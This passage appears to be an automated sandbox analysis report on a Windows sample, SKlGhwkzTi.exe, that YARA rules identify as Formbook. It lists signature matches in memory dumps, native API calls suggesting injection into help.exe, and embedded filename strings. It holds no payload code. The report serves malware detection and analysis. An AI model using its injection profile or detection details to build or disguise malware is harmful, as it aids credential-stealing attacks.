          Source: 00000004.00000002.761631200.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000D.00000002.918580029.0000000003510000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000D.00000002.918580029.0000000003510000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000000.677567627.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000000.677567627.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000D.00000002.918415309.00000000032E0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000D.00000002.918415309.00000000032E0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.763395770.0000000001530000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.763395770.0000000001530000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000D.00000002.918604632.0000000003540000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000D.00000002.918604632.0000000003540000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.679714687.0000000003DE9000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.679714687.0000000003DE9000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.763453752.0000000001560000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.763453752.0000000001560000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 4.2.SKlGhwkzTi.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 4.2.SKlGhwkzTi.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 4.2.SKlGhwkzTi.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 4.2.SKlGhwkzTi.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 4.0.SKlGhwkzTi.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 4.0.SKlGhwkzTi.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 4.0.SKlGhwkzTi.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 4.0.SKlGhwkzTi.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.SKlGhwkzTi.exe.3de9930.1.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.SKlGhwkzTi.exe.3de9930.1.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_004181B0 NtCreateFile,4_2_004181B0
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_00418260 NtReadFile,4_2_00418260
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_004182E0 NtClose,4_2_004182E0
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_00418390 NtAllocateVirtualMemory,4_2_00418390
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_004182AC NtReadFile,4_2_004182AC
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_0041838B NtAllocateVirtualMemory,4_2_0041838B
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_018A99A0 NtCreateSection,LdrInitializeThunk,4_2_018A99A0
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_018A9910 NtAdjustPrivilegesToken,LdrInitializeThunk,4_2_018A9910
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_018A98F0 NtReadVirtualMemory,LdrInitializeThunk,4_2_018A98F0
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_018A9840 NtDelayExecution,LdrInitializeThunk,4_2_018A9840
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_018A9860 NtQuerySystemInformation,LdrInitializeThunk,4_2_018A9860
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_018A9A00 NtProtectVirtualMemory,LdrInitializeThunk,4_2_018A9A00
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_018A9A20 NtResumeThread,LdrInitializeThunk,4_2_018A9A20
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_018A9A50 NtCreateFile,LdrInitializeThunk,4_2_018A9A50
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_018A95D0 NtClose,LdrInitializeThunk,4_2_018A95D0
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_018A9540 NtReadFile,LdrInitializeThunk,4_2_018A9540
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_018A9780 NtMapViewOfSection,LdrInitializeThunk,4_2_018A9780
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_018A97A0 NtUnmapViewOfSection,LdrInitializeThunk,4_2_018A97A0
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_018A9FE0 NtCreateMutant,LdrInitializeThunk,4_2_018A9FE0
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_018A9710 NtQueryInformationToken,LdrInitializeThunk,4_2_018A9710
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_018A96E0 NtFreeVirtualMemory,LdrInitializeThunk,4_2_018A96E0
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_018A9660 NtAllocateVirtualMemory,LdrInitializeThunk,4_2_018A9660
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_018A99D0 NtCreateProcessEx,4_2_018A99D0
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_018A9950 NtQueueApcThread,4_2_018A9950
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_018A98A0 NtWriteVirtualMemory,4_2_018A98A0
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_018A9820 NtEnumerateKey,4_2_018A9820
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_018AB040 NtSuspendThread,4_2_018AB040
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_018AA3B0 NtGetContextThread,4_2_018AA3B0
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_018A9B00 NtSetValueKey,4_2_018A9B00
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_018A9A80 NtOpenDirectoryObject,4_2_018A9A80
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_018A9A10 NtQuerySection,4_2_018A9A10
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_018A95F0 NtQueryInformationFile,4_2_018A95F0
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_018A9520 NtWaitForSingleObject,4_2_018A9520
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_018AAD30 NtSetContextThread,4_2_018AAD30
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_018A9560 NtWriteFile,4_2_018A9560
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_018AA710 NtOpenProcessToken,4_2_018AA710
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_018A9730 NtQueryVirtualMemory,4_2_018A9730
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_018A9760 NtOpenProcess,4_2_018A9760
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_018AA770 NtOpenThread,4_2_018AA770
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_018A9770 NtSetInformationFile,4_2_018A9770
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_018A96D0 NtCreateKey,4_2_018A96D0
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_018A9610 NtEnumerateValueKey,4_2_018A9610
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_018A9650 NtQueryValueKey,4_2_018A9650
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_018A9670 NtQueryInformationProcess,4_2_018A9670
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_03A09A50 NtCreateFile,LdrInitializeThunk,13_2_03A09A50
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_03A099A0 NtCreateSection,LdrInitializeThunk,13_2_03A099A0
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_03A09910 NtAdjustPrivilegesToken,LdrInitializeThunk,13_2_03A09910
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_03A09860 NtQuerySystemInformation,LdrInitializeThunk,13_2_03A09860
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_03A09840 NtDelayExecution,LdrInitializeThunk,13_2_03A09840
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_03A09780 NtMapViewOfSection,LdrInitializeThunk,13_2_03A09780
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_03A09FE0 NtCreateMutant,LdrInitializeThunk,13_2_03A09FE0
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_03A09710 NtQueryInformationToken,LdrInitializeThunk,13_2_03A09710
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_03A096E0 NtFreeVirtualMemory,LdrInitializeThunk,13_2_03A096E0
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_03A096D0 NtCreateKey,LdrInitializeThunk,13_2_03A096D0
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_03A09660 NtAllocateVirtualMemory,LdrInitializeThunk,13_2_03A09660
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_03A09650 NtQueryValueKey,LdrInitializeThunk,13_2_03A09650
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_03A095D0 NtClose,LdrInitializeThunk,13_2_03A095D0
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_03A09540 NtReadFile,LdrInitializeThunk,13_2_03A09540
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_03A0A3B0 NtGetContextThread,13_2_03A0A3B0
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_03A09B00 NtSetValueKey,13_2_03A09B00
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_03A09A80 NtOpenDirectoryObject,13_2_03A09A80
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_03A09A20 NtResumeThread,13_2_03A09A20
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_03A09A00 NtProtectVirtualMemory,13_2_03A09A00
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_03A09A10 NtQuerySection,13_2_03A09A10
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_03A099D0 NtCreateProcessEx,13_2_03A099D0
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_03A09950 NtQueueApcThread,13_2_03A09950
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_03A098A0 NtWriteVirtualMemory,13_2_03A098A0
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_03A098F0 NtReadVirtualMemory,13_2_03A098F0
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_03A09820 NtEnumerateKey,13_2_03A09820
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_03A0B040 NtSuspendThread,13_2_03A0B040
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_03A097A0 NtUnmapViewOfSection,13_2_03A097A0
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_03A09730 NtQueryVirtualMemory,13_2_03A09730
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_03A0A710 NtOpenProcessToken,13_2_03A0A710
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_03A09760 NtOpenProcess,13_2_03A09760
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_03A0A770 NtOpenThread,13_2_03A0A770
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_03A09770 NtSetInformationFile,13_2_03A09770
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_03A09610 NtEnumerateValueKey,13_2_03A09610
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_03A09670 NtQueryInformationProcess,13_2_03A09670
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_03A095F0 NtQueryInformationFile,13_2_03A095F0
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_03A09520 NtWaitForSingleObject,13_2_03A09520
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_03A0AD30 NtSetContextThread,13_2_03A0AD30
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_03A09560 NtWriteFile,13_2_03A09560
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_032F8390 NtAllocateVirtualMemory,13_2_032F8390
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_032F8260 NtReadFile,13_2_032F8260
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_032F82E0 NtClose,13_2_032F82E0
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_032F81B0 NtCreateFile,13_2_032F81B0
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_032F838B NtAllocateVirtualMemory,13_2_032F838B
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_032F82AC NtReadFile,13_2_032F82AC
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 0_2_014DB2840_2_014DB284
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 0_2_014DC2D00_2_014DC2D0
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 0_2_014D99B00_2_014D99B0
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 0_2_014DDF9B0_2_014DDF9B
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 0_2_052BE0E80_2_052BE0E8
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 0_2_052BD2400_2_052BD240
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 0_2_052BDAE80_2_052BDAE8
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 0_2_052BADF80_2_052BADF8
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 0_2_052BAE080_2_052BAE08
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_004010304_2_00401030
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_0041B8B14_2_0041B8B1
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_0041B9634_2_0041B963
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_00408C4B4_2_00408C4B
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_00408C504_2_00408C50
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_0041B4934_2_0041B493
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_0041B4964_2_0041B496
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_0041C5394_2_0041C539
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_00402D894_2_00402D89
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_00402D904_2_00402D90
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_0041CE854_2_0041CE85
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_0041BF124_2_0041BF12
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_0041C7954_2_0041C795
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_00402FB04_2_00402FB0
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_0186F9004_2_0186F900
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_018841204_2_01884120
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_0187B0904_2_0187B090
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_018920A04_2_018920A0
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_019320A84_2_019320A8
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_019328EC4_2_019328EC
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_019210024_2_01921002
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_0193E8244_2_0193E824
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_0189EBB04_2_0189EBB0
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_0192DBD24_2_0192DBD2
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_019203DA4_2_019203DA
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_01932B284_2_01932B28
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_019322AE4_2_019322AE
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_0191FA2B4_2_0191FA2B
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_018925814_2_01892581
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_019325DD4_2_019325DD
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_0187D5E04_2_0187D5E0
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_01932D074_2_01932D07
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_01860D204_2_01860D20
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_01931D554_2_01931D55
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_0187841F4_2_0187841F
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_0192D4664_2_0192D466
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_0193DFCE4_2_0193DFCE
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_01931FF14_2_01931FF1
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_01932EF74_2_01932EF7
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_0192D6164_2_0192D616
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_01886E304_2_01886E30
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_039FEBB013_2_039FEBB0
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_03A8DBD213_2_03A8DBD2
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_03A92B2813_2_03A92B28
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_03A922AE13_2_03A922AE
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_039CF90013_2_039CF900
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_039E412013_2_039E4120
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_03A920A813_2_03A920A8
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_039DB09013_2_039DB090
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_039F20A013_2_039F20A0
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_03A928EC13_2_03A928EC
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_03A8100213_2_03A81002
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_03A91FF113_2_03A91FF1
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_03A92EF713_2_03A92EF7
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_039E6E3013_2_039E6E30
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_03A8D61613_2_03A8D616
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_039F258113_2_039F2581
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_03A925DD13_2_03A925DD
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_039DD5E013_2_039DD5E0
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_03A92D0713_2_03A92D07
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_039C0D2013_2_039C0D20
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_03A91D5513_2_03A91D55
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_039D841F13_2_039D841F
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_03A8D46613_2_03A8D466
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_032FB95413_2_032FB954
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_032FB8B113_2_032FB8B1
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_032FBF1213_2_032FBF12
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_032E2FB013_2_032E2FB0
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_032FC79513_2_032FC795
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_032FCE8513_2_032FCE85
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_032FC53913_2_032FC539
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_032E2D8913_2_032E2D89
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_032E2D9013_2_032E2D90
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_032E8C4B13_2_032E8C4B
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_032E8C5013_2_032E8C50
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_032FB49613_2_032FB496
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_032FB49313_2_032FB493
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: String function: 0186B150 appears 45 times
          Source: C:\Windows\SysWOW64\help.exeCode function: String function: 039CB150 appears 35 times
          Source: SKlGhwkzTi.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: SKlGhwkzTi.exeBinary or memory string: OriginalFilename vs SKlGhwkzTi.exe
          Source: SKlGhwkzTi.exe, 00000000.00000002.691758486.0000000008C10000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamemscorrc.dllT vs SKlGhwkzTi.exe
          Source: SKlGhwkzTi.exe, 00000000.00000002.678186974.0000000000942000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameSoapOption.exe. vs SKlGhwkzTi.exe
          Source: SKlGhwkzTi.exe, 00000000.00000002.679347370.0000000002E23000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameKygo.dll* vs SKlGhwkzTi.exe
          Source: SKlGhwkzTi.exe, 00000000.00000002.691169517.0000000007480000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameDSASignature.dll@ vs SKlGhwkzTi.exe
          Source: SKlGhwkzTi.exeBinary or memory string: OriginalFilename vs SKlGhwkzTi.exe
          Source: SKlGhwkzTi.exe, 00000004.00000002.764137531.000000000195F000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs SKlGhwkzTi.exe
          Source: SKlGhwkzTi.exe, 00000004.00000002.761811924.0000000000E02000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameSoapOption.exe. vs SKlGhwkzTi.exe
          Source: SKlGhwkzTi.exe, 00000004.00000002.763603378.00000000015A9000.00000004.00000020.sdmpBinary or memory string: OriginalFilenameHelp.Exej% vs SKlGhwkzTi.exe
          Source: SKlGhwkzTi.exeBinary or memory string: OriginalFilenameSoapOption.exe. vs SKlGhwkzTi.exe
          Source: SKlGhwkzTi.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: 00000004.00000002.761631200.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.761631200.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000D.00000002.918580029.0000000003510000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000D.00000002.918580029.0000000003510000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000000.677567627.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000000.677567627.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000D.00000002.918415309.00000000032E0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000D.00000002.918415309.00000000032E0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.763395770.0000000001530000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.763395770.0000000001530000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000D.00000002.918604632.0000000003540000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
